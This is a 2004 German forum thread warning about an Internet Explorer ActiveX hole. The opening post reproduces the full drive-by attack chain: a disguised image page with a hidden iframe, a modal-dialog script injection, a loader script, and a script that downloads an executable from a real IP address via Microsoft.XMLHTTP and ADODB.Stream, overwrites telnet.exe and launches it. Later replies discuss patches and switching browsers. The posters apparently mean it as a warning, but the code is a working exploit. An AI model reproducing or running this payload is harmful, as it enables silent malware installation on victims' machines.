mediengestalter.info
FAQ :: Mitgliederliste :: MGi Team

Willkommen auf dem Portal für Mediengestalter

Aktuelles Datum und Uhrzeit: Di 06.12.2016 09:33 Benutzername: Passwort: Auto-Login

Thema: [IE] Sicherheitslücke ActiveXObjects „Microsoft.XMLHTTP“ ... vom 12.06.2004


Neues Thema eröffnen   Neue Antwort erstellen MGi Foren-Übersicht -> Software - Nonprint -> [IE] Sicherheitslücke ActiveXObjects „Microsoft.XMLHTTP“ ...
Seite: 1, 2  Weiter
Autor Nachricht
[fränK]
Moderator
Threadersteller

Dabei seit: 27.04.2002
Ort: -
Alter: -
Geschlecht: Männlich
Verfasst Sa 12.06.2004 00:58
Titel

[IE] Sicherheitslücke ActiveXObjects „Microsoft.XMLHTTP“ ...

Antworten mit Zitat Zum Seitenanfang

Tachjen,

sollte euch auch einer damit verarschen wollen:
(mit aktiver Firewall bringt das glücklicherweise
keinen Erfolg)


ACHTUNG!
Nur mit aktiver Firewall testen!

Links sind sicherheitshalber nicht zum anklicken!
Die „Telnet.exe“ sollte man danach durch das
Original ersetzen (bei Betriebssystemen mit
Systemdateienschutz z.B. Windows XP geht das
fast automatisch)


Klickt man auf untenstehenden Link, sieht man
ein tolles Bildchen...(der Link sieht auch nach nur
einem JPG aus).
Im Hintergrund wird die „Telnet.exe“ im Windows-
System32-Verzeichnis überschrieben und ausgeführt.
Das übertragene Programm tarnt sich als „Windows
Messenger“ von Microsoft.

Ermöglicht wird das Ganze durch die ActiveX-Kompo-
nenten „Microsoft.XMLHTTP“ und „ADODB.Stream“.

Hier die verwendeten Dateien:

Der Link zum Übel:
h++p://www.banyantreedesign.com/files/flowsheet.jpg
Code:
<html><body><img src="image.jpg"><iframe src="http://66.119.180.10:8080/starter.htm" height="0" width="0"></body></html>


h++p://66.119.180.10:8080/starter.htm
Code:
<html>
<body>

<script language="Javascript">

    function InjectedDuringRedirection(){
      showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://66.119.180.10:8080/shellscript_loader.js\\'><\/script>'";
    }

</script>

<script language="javascript">

    setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
    setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
    document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=200 HEIGHT=200></IFRAME>');

</script>

</body>
</html>


h++p://66.119.180.10:8080/shellscript_loader.js
Code:
function getRealShell() {
    myiframe.document.write("<SCRIPT SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);


h++p://66.119.180.10:8080/shellscript.js
Code:
var downloadurl="http://66.119.180.10:8080/a.exe";

if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe";

payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();

function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }

var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);

location.href = "telnet://";


Trotzdem noch viel Spaß beim surfen! *zwinker*
  View user's profile Private Nachricht senden
cyanamide
Moderator

Dabei seit: 09.12.2002
Ort: Altkaiserreich Koblenz WW
Alter: 40
Geschlecht: Weiblich
Verfasst Sa 12.06.2004 01:02
Titel

Antworten mit Zitat Zum Seitenanfang

Au weia!

Ist das noch nicht behoben mit den aktuellen Updates?

uiiii
  View user's profile Private Nachricht senden
Anzeige
Anzeige
[fränK]
Moderator
Threadersteller

Dabei seit: 27.04.2002
Ort: -
Alter: -
Geschlecht: Männlich
Verfasst Sa 12.06.2004 01:26
Titel

Antworten mit Zitat Zum Seitenanfang

Mmm, ich habe alle verfügbaren Updates
installiert und es geht trotzdem... Menno!
  View user's profile Private Nachricht senden
localhost

Dabei seit: 25.04.2003
Ort: nähe Bielefeld
Alter: 39
Geschlecht: Männlich
Verfasst Sa 12.06.2004 07:30
Titel

Antworten mit Zitat Zum Seitenanfang

wat will man erwarten von mickysoft? öfter mal wat neues.....der schrott ist einfach toooo bugy
  View user's profile Private Nachricht senden
el Zeratulo

Dabei seit: 04.04.2002
Ort: Bent Badheim
Alter: -
Geschlecht: Männlich
Verfasst Sa 12.06.2004 08:58
Titel

Antworten mit Zitat Zum Seitenanfang

Nein, wird nicht durch die aktuellen Updates behoben.

Noch schlimmer ist das ein aktuell komplett gepatchtes Windows mit deaktiviertem ActiveX von

http://www.heise.de/newsticker/meldung/48016

Problemlos mit einem Virus infiziert werden kann.

Also schnell den Browser wechseln (falls nicht schon längst geschehen)

FireFox 0.9 is released
http://www.mozilla.org/

(RC1)


Zuletzt bearbeitet von el Zeratulo am Sa 12.06.2004 10:11, insgesamt 1-mal bearbeitet
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
red_sista_kathy

Dabei seit: 20.03.2003
Ort: -
Alter: 34
Geschlecht: Weiblich
Verfasst Sa 12.06.2004 10:00
Titel

Antworten mit Zitat Zum Seitenanfang

wieso soll Firefox out sein??????
so'n quaaaaak :-[

mein freund arbeitet in so 'ner computerfreakfirma in der ausnahmslos alle megafreaks sind
und die sich zum großteil darauf spezialisiert haben sicherheitslücken in windows zu testen.
sein chef, der sowieso nur drauf aus ist microsoftlücken zu finden
(was ja leider nicht so schwer ist, wenn ein 17jähriger einen für microsoft "unbezwingbaren" wurm in umlauf bringt)
und diese microsoft vorn latz zu knallen, ist überzeugter FIREFOX USER muahaha

*bäh*

von wegen OUT tststssssss *balla balla*
  View user's profile Private Nachricht senden
el Zeratulo

Dabei seit: 04.04.2002
Ort: Bent Badheim
Alter: -
Geschlecht: Männlich
Verfasst Sa 12.06.2004 10:11
Titel

Antworten mit Zitat Zum Seitenanfang

red_sista_kathy hat geschrieben:
wieso soll Firefox out sein??????
so'n quaaaaak :-[

mein freund arbeitet in so 'ner computerfreakfirma in der ausnahmslos alle megafreaks sind
und die sich zum großteil darauf spezialisiert haben sicherheitslücken in windows zu testen.
sein chef, der sowieso nur drauf aus ist microsoftlücken zu finden
(was ja leider nicht so schwer ist, wenn ein 17jähriger einen für microsoft "unbezwingbaren" wurm in umlauf bringt)
und diese microsoft vorn latz zu knallen, ist überzeugter FIREFOX USER muahaha

*bäh*

von wegen OUT tststssssss *balla balla*


Das war englisch.
Und hieß soviel wie
Firefox 0.9 ist erschienen.

ich werds aber sicherheitshalber jetzt editieren damit nicht mehr leute die zeile falsch interpretieren
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
Waschbequen
Account gelöscht


Ort: -

Verfasst Sa 12.06.2004 10:40
Titel

Antworten mit Zitat Zum Seitenanfang

*Thumbs up!* @el

Wusste gar nicht, dass XMLhttp auf manchen Windows-Systemen standardmäßig installiert ist. Na ja. Ansonsten ist das Ding imho nämlich das beste und geilste Tool überhaupt in der MS-Scriptingwelt. Kann man tolle Sachen mit anstellen - leider halt auch sowas *zwinker*
 
 
Ähnliche Themen PHP kritische Sicherheitslücke
Wieder neue Sicherheitslücke im Internet Explorer
microsoft silverlight
Microsoft Office v. X auf 2 Rechnern?
Microsoft Access Datenbank
[Wettbewerb] Microsoft ImagineCup 2004
Neues Thema eröffnen   Neue Antwort erstellen Seite: 1, 2  Weiter
MGi Foren-Übersicht -> Software - Nonprint


Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst an Umfragen in diesem Forum nicht mitmachen.